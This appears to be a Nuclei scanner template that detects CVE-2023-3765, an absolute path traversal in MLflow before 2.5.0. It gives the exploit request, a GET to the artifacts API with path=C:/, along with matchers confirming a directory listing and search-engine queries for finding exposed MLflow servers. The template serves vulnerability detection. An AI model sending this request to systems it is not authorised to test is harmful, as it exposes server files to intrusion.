58 lines
1.8 KiB
YAML
58 lines
1.8 KiB
YAML
id: CVE-2023-3765
|
|
|
|
info:
|
|
name: MLflow Absolute Path Traversal
|
|
author: DhiyaneshDK
|
|
severity: critical
|
|
description: |
|
|
Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.
|
|
impact: |
|
|
This vulnerability can lead to unauthorized access to sensitive information stored on the server.
|
|
remediation: |
|
|
Upgrade to a patched version of MLflow to mitigate the Absolute Path Traversal vulnerability.
|
|
reference:
|
|
- https://www.tenable.com/cve/CVE-2023-3765
|
|
- https://huntr.dev/bounties/4be5fd63-8a0a-490d-9ee1-f33dc768ed76
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3765
|
|
- https://github.com/mlflow/mlflow/commit/6dde93758d42455cb90ef324407919ed67668b9b
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2023-3765
|
|
cwe-id: CWE-36
|
|
epss-score: 0.01303
|
|
epss-percentile: 0.85869
|
|
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: lfprojects
|
|
product: mlflow
|
|
shodan-query: http.title:"mlflow"
|
|
fofa-query: title="mlflow"
|
|
google-query: intitle:"mlflow"
|
|
tags: cve2023,cve,mflow,lfi,huntr,lfprojects
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '"is_dir":'
|
|
- '"path":'
|
|
- '"files":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- application/json
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402207a68493afeda3a529c805502d554dd09859471f0b6f015d91fc552daf23ecdab02206b1a2148e223a672e1bea3d217a5a72cc442d12cde66b1bd15d9548a6f6b2e55:922c64590222798bb761d5b6d8e72950 |